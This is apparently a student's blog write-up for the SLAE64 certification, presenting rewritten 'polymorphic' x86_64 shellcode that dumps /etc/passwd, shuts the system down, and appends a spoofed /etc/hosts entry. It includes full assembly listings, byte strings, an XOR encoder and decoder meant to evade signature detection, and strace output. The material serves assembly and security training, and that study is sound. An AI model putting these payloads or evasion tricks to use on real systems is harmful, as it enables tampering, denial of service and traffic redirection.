After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the sixth assignment; take three x64 payloads from ShellStorm and create new, polymorphic versions which have the same functionality.
While this sounds super cool, what we’re actually doing is simply changing the content of the shellcode to try to evade detection by basic security tools that use signature based matching to recognise threats. A limitation of the assignment is to stay within 150% of the original payload size.
Dump Password Payload
As most of the previous assignments have focused on network operations, I chose the first shellcode sample because it used file I/O.
The starting point is Mr.Un1k0d3r’s Read /etc/passwd payload which is 82 bytes in size:
BITS 64 ; Author Mr.Un1k0d3r - RingZer0 Team ; Read /etc/passwd Linux x86_64 Shellcode ; Shellcode size 82 bytes global _start section .text _start: jmp _push_filename _readfile: ; syscall open file pop rdi ; pop path value ; NULL byte fix xor byte [rdi + 11], 0x41 xor rax, rax add al, 2 xor rsi, rsi ; set O_RDONLY flag syscall ; syscall read file sub sp, 0xfff lea rsi, [rsp] mov rdi, rax xor rdx, rdx mov dx, 0xfff; size to read xor rax, rax syscall ; syscall write to stdout xor rdi, rdi add dil, 1 ; set stdout fd = 1 mov rdx, rax xor rax, rax add al, 1 syscall ; syscall exit xor rax, rax add al, 60 syscall _push_filename: call _readfile path: db "/etc/passwdA"
The original code uses the jump, call, pop method to locate the address of the ‘/etc/passwd’ string at the end of the payload. We can mutate this by converting the string into a hex number and pushing it onto the stack. This involves reversing the string and breaking it into 8 byte chunks. Note that we can’t use a NULL terminator on the string, so we’ll use a value of 0x1 and fix it afterwards.
push 0x01647773 ; 0x01 + dws mov rbx, 0x7361702f6374652f ; sap/cte/ push rbx mov rdi, rsp ; Get address of path string dec byte [rdi+11] ; NULL byte fix
This change saves 2 bytes and transforms the raw strings visible in the shellcode.
The remainder of the first section sets the parameters for the SYS_OPEN syscall. We can modify these and save another 2 bytes:
push 2 sub rsi, rsi ; set O_RDONLY flag pop rax syscall
The next section of the payload uses SYS_READ to read the content of the file into a buffer of 0xfff (4096 decimal) bytes which is allocated on the stack. There isn’t much to work with here, but we can optimise the parameter shuffling by swapping in known zero values instead of XORing and use a subtract operation to hide the 0xfff value.
push rax ; Save file handle xchg rsi, rax ; Zero out RAX push rax pop rdx pop rdi sub dx, 0xf001 sub rsp, rdx ; Make room on the stack lea rsi, [rsp] ; Pass the buffer address syscall
These changes save a further 4 bytes.
The third section uses SYS_WRITE to dump the data from the stack buffer to STDOUT. Again, there isn’t much to work with, but by optimising the parameters we can save 8 bytes:
push 1 pop rdx xchg rax, rdx ; syscall id and read size push rax pop rdi ; fd id syscall
The last section is a simple SYS_EXIT, all we can do here is try to save some bytes:
push 60 pop rax syscall
Putting the whole thing together gives us pw_dump.nasm:
push 0x01647773 mov rbx, 0x7361702f6374652f push rbx mov rdi, rsp ; Get addr of path string dec byte [rdi+11] ; NULL byte fix push 2 sub rsi, rsi ; set O_RDONLY flag pop rax syscall ; sys_open push rax ; Save file handle xchg rsi, rax ; Zero out RAX push rax pop rdx pop rdi ; File ID sub dx, 0xf001 sub rsp, rdx ; Make room on the stack lea rsi, [rsp] ; Pass the buffer address syscall ; sys_read push 1 pop rdx xchg rax, rdx ; syscall id and read size push rax pop rdi ; STDOUT (1) syscall ; sys_write push 60 pop rax syscall ; sys_exit
Extracting the payload results in a 64 byte shellcode string; a saving of 18 bytes:
"\x68\x73\x77\x64\x01\x48\xbb\x2f\x65\x74\x63\x2f" "\x70\x61\x73\x53\x48\x89\xe7\xfe\x4f\x0b\x6a\x02" "\x48\x29\xf6\x58\x0f\x05\x50\x48\x96\x50\x5a\x5f" "\x66\x81\xea\x01\xf0\x48\x29\xd4\x48\x8d\x34\x24" "\x0f\x05\x6a\x01\x5a\x48\x92\x50\x5f\x0f\x05\x6a" "\x3c\x58\x0f\x05"
The next shellcode sample to be tackled is shutdown -h now by Osanda Malith Jayathissa which is a 65 byte payload.
; Title: shutdown -h now x86_64 Shellcode - 65 bytes ; Platform: linux/x86_64 ; Date: 2014-06-27 ; Author: Osanda Malith Jayathissa (@OsandaMalith) section .text global _start _start: xor rax, rax xor rdx, rdx push rax push byte 0x77 push word 0x6f6e ; now mov rbx, rsp push rax push word 0x682d ;-h mov rcx, rsp push rax mov r8, 0x2f2f2f6e6962732f ; /sbin/shutdown mov r10, 0x6e776f6474756873 push r10 push r8 mov rdi, rsp push rdx push rbx push rcx push rdi mov rsi, rsp add rax, 59 syscall
There is another version of this code from another SLAE student on the ShellStorm site which is 1 byte smaller and uses some payload encoding. I decided to start with the original and see what I could do.
The code is an execve call to the system’s shutdown command. At the start the RAX and RDX registers are cleared. Looking through the code, RDX isn’t used until the end where becomes a syscall parameter while RAX is used to push zeros onto the stack until the syscall at the end. This seems wasteful so we’ll just clear RDX for zero pushes and worry about RAX later.
_start: xor rdx, rdx push rdx
The first PUSH adds a NULL to terminate the argument array which will be built in the next steps.
The next three sections push the argument strings onto the stack. As we’re working through the argument array in reverse, the ‘now’ string is the first item.
The original code pushes hexadecimal values to build the strings. I decided to use NOT inverted strings throughout the code to hide the content. This conceals the string values in the raw shellcode and gets around the NULL byte problem at the same time. However, pushing and NOTing the strings one at a time bloated the shellcode up to about 82 bytes.
... push dword 0xffffffffff889091 ; inverse of 'now\x00' not qword [rsp] push rsp pop rbx ...
A second attempt at pushing the inverted strings and running a NOT loop over the stack afterwards got the code down to 76 bytes, but this was still not good enough. Some restructuring is required.
First, we define our inverted strings as data bytes and get the address using the jump, call, pop method:
jmp _str ; Get addr of strings in RAX _build: pop rax ... _str: call _build _now: db 0x91, 0x90, 0x88, 0xff _h: db 0xd2, 0x97, 0xff _cmd: db 0xd0, 0x8c, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0x8a, 0x8b, 0x9b, 0x90, 0x88, 0x91, 0xff
With the start address of the data in RAX, we can build the argument array on the stack and store its address in RSI ready for the execve syscall:
push rax ; 'now' lea rdi, [rax+4] ; '-h' push rdi lea rdi, [rax+7] ; '/sbin/shutdown' push rdi push rsp ; Save arg array addr pop rsi
Using RDI for the effective address calculations also means that the command string for the syscall is populated at this point.
The strings are still mangled, but we can run the NOT loop over the original data location using the value in RAX:
push 0x16 pop rcx _decode: not byte [rax] inc rax loop _decode
Now RDI and RSI point to decoded strings, RDX was cleared at the start, all that remains is to trigger the syscall:
push 0x3b pop rax syscall
The complete listing of shutdown.nasm is pretty compact:
global _start section .TEXT exec write _start: xor rdx, rdx push rdx ; NULL to terminate arg array jmp _str ; Get addr of strings in RAX _build: pop rax ; Load string addresses onto stack push rax ; 'now' lea rdi, [rax+4] ; '-h' push rdi lea rdi, [rax+7] ; '/sbin/shutdown' push rdi push rsp ; Save arg array addr pop rsi ; Decode strings push 0x16 pop rcx _decode: not byte [rax] inc rax loop _decode push 0x3b pop rax syscall _str: call _build _now: db 0x91, 0x90, 0x88, 0xff _h: db 0xd2, 0x97, 0xff _cmd: db 0xd0, 0x8c, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0x8a, 0x8b, 0x9b, 0x90, 0x88, 0x91, 0xff
Shellcode Extraction results in a 62 byte string, just squeezing under the original and alternative implementations.
"\x48\x31\xd2\x52\xeb\x1d\x58\x50\x48\x8d\x78" "\x04\x57\x48\x8d\x78\x07\x57\x54\x5e\x6a\x16" "\x59\xf6\x10\x48\xff\xc0\xe2\xf9\x6a\x3b\x58" "\x0f\x05\xe8\xde\xff\xff\xff\x91\x90\x88\xff" "\xd2\x97\xff\xd0\x8c\x9d\x96\x91\xd0\x8c\x97" "\x8a\x8b\x9b\x90\x88\x91\xff";
Add Host Mapping
For the last example I decided to try another file based example: Add map in /etc/hosts file also by Osanda Malith Jayathissa. This is a 110 byte payload that adds a spoof mapping to the /etc/hosts file allowing redirection of network traffic.
; Title: Add map in /etc/hosts file - 110 bytes ; Date: 2014-10-29 ; Platform: linux/x86_64 ; Website: http://osandamalith.wordpress.com ; Author: Osanda Malith Jayathissa (@OsandaMalith) global _start section .text _start: ;open xor rax, rax add rax, 2 ; open syscall xor rdi, rdi xor rsi, rsi push rsi ; 0x00 mov r8, 0x2f2f2f2f6374652f ; stsoh/ mov r10, 0x7374736f682f2f2f ; /cte/ push r10 push r8 add rdi, rsp xor rsi, rsi add si, 0x401 syscall ;write xchg rax, rdi xor rax, rax add rax, 1 ; syscall for write jmp data write: pop rsi mov dl, 19 ; length in rdx syscall ;close xor rax, rax add rax, 3 syscall ;exit xor rax, rax mov al, 60 xor rdi, rdi syscall data: call write text db '127.1.1.1 google.lk'
For this exercise I decided to use a different method of string referencing. A CALL instruction can be used to jump over an inline string while helpfully placing the string’s address on the stack. Unfortunately, because 64 bit CALLs are minimum of 4 bytes, they introduce zeros into the shellcode. This is normally handled by jumping backwards, but in this example we’ll try something else.
In the first section where we call the SYS_OPEN syscall, the path string can be incorporated into the code with a CALL. This really helps reduce the size of the final shellcode:
; open xor rsi, rsi add si, 0x401 ; read/write and append flags call _jump1 db '/etc/hosts', 0x00 _jump1: pop rdi ; path reference push 2 pop rax syscall
However, the disassembly shows the zeros introduces by the CALL instruction:
0000000000600078 <_start>: 600078: 48 31 f6 xor rsi,rsi 60007b: 66 81 c6 01 04 add si,0x401 600080: e8 0b 00 00 00 call 600090 <_jump1> 600085: 2f 65 74 63 ... (bad) ... 0000000000600090 <_jump1>: 600090: 5f pop rdi 600091: 6a 02 push 0x2 600093: 58 pop rax 600094: 0f 05 syscall
To solve this and obscure the string contents, we will encode the entire payload and write a small decoder header.
The remainder of the code is quite straightforward and we can make some quick optimisations to bring the size down.
The final pre-encoding version is addhost_pre_encode.nasm
_start: ; open xor rsi, rsi add si, 0x401 ; read/write and append flags call _jump1 db '/etc/hosts', 0x00 _jump1: pop rdi ; path reference push 2 pop rax syscall ; write xchg rax, rdi push 1 pop rax ; syscall for write call _jump2 db '127.1.1.1 google.lk', 0xa _jump2: pop rsi push 20 ; data length in rdx pop rdx syscall ;close push 3 pop rax syscall ;exit push 60 pop rax syscall
The optimisations have squeezed the code down to 76 bytes, leaving 34 bytes to write the decoder stub.
A simple one byte XOR encoding of the shellcode requires a few lines of Python:
MBP:slae64$ python Python 2.7.3 (default, Oct 26 2016, 21:01:49) [GCC 4.6.3] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> import sys >>> payload = [0x48,0x31,0xf6,0x66,0x81,0xc6,0x01,0x04,0xe8,0x0b,0x00,0x00,0x00,0x2f,0x65, ... >>> for b in payload: ... sys.stdout.write(hex(b ^ 0x41) + ',') ... 0x9,0x70,0xb7,0x27,0xc0,0x87,0x40,0x45,0xa9,0x4a,0x41,0x41,0x41,0x6e,0x24,0x35,0x22,0x6e,0x29, 0x2e,0x32,0x35,0x32,0x41,0x1e,0x2b,0x43,0x19,0x4e,0x44,0x9,0xd6,0x2b,0x40,0x19,0xa9,0x55,0x41, 0x41,0x41,0x70,0x73,0x76,0x6f,0x70,0x6f,0x70,0x6f,0x70,0x61,0x26,0x2e,0x2e,0x26,0x2d,0x24,0x6f, 0x2d,0x2a,0x4b,0x1f,0x2b,0x55,0x1b,0x4e,0x44,0x2b,0x42,0x19,0x4e,0x44,0x2b,0x7d,0x19,0x4e,0x44, >>>
The decoder header uses a jump, call and pop to get the address of the payload, then a simple bytewise XOR loop to decode the data.
_start: jmp _code_marker ; Get the payload address _decode: pop rax push 76 ; Decode pop rcx _decode_loop: xor byte [rax], 0x41 inc rax loop _decode_loop jmp _payload ; Jump to decoded payload _code_marker: call _decode _payload: db 0x09,0x70,0xb7,0x27,0xc0,0x87,0x40,0x45,0xa9,0x4a db 0x41,0x41,0x41,0x6e,0x24,0x35,0x22,0x6e,0x29,0x2e db 0x32,0x35,0x32,0x41,0x1e,0x2b,0x43,0x19,0x4e,0x44 db 0x09,0xd6,0x2b,0x40,0x19,0xa9,0x55,0x41,0x41,0x41 db 0x70,0x73,0x76,0x6f,0x70,0x6f,0x70,0x6f,0x70,0x61 db 0x26,0x2e,0x2e,0x26,0x2d,0x24,0x6f,0x2d,0x2a,0x4b db 0x1f,0x2b,0x55,0x1b,0x4e,0x44,0x2b,0x42,0x19,0x4e db 0x44,0x2b,0x7d,0x19,0x4e,0x44
There is a little bit of faff with labels on the payload, we must jump over the call _decode instruction to the _payload marker after the decode loop completes or we will get stuck in an endless decoder loop. Fortunately, labels don’t add to the size of the shellcode and short jumps are only two bytes.
This completes the addhost.nasm code. The final size of the shell code is 97 bytes, well under the original, even with added content obfuscation.
We can test the operation of the shellcode using strace to confirm the syscalls:
MBP:slae64$ strace ./addhost execve("./addhost", ["./addhost"], [/* 23 vars */]) = 0 open("/etc/hosts", O_WRONLY|O_APPEND) = 3 write(3, "127.1.1.1 google.lk\n", 20) = 20 close(3) = 0 _exit(3) = ? MBP:slae64$
I have deliberately tried to select some different payloads in this assignment and I have used different techniques to add some variety to the results. This has been very useful in allowing me to experiment with some of the optimisations and tricks I have seen while studying the SLAE64 course.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE64-1471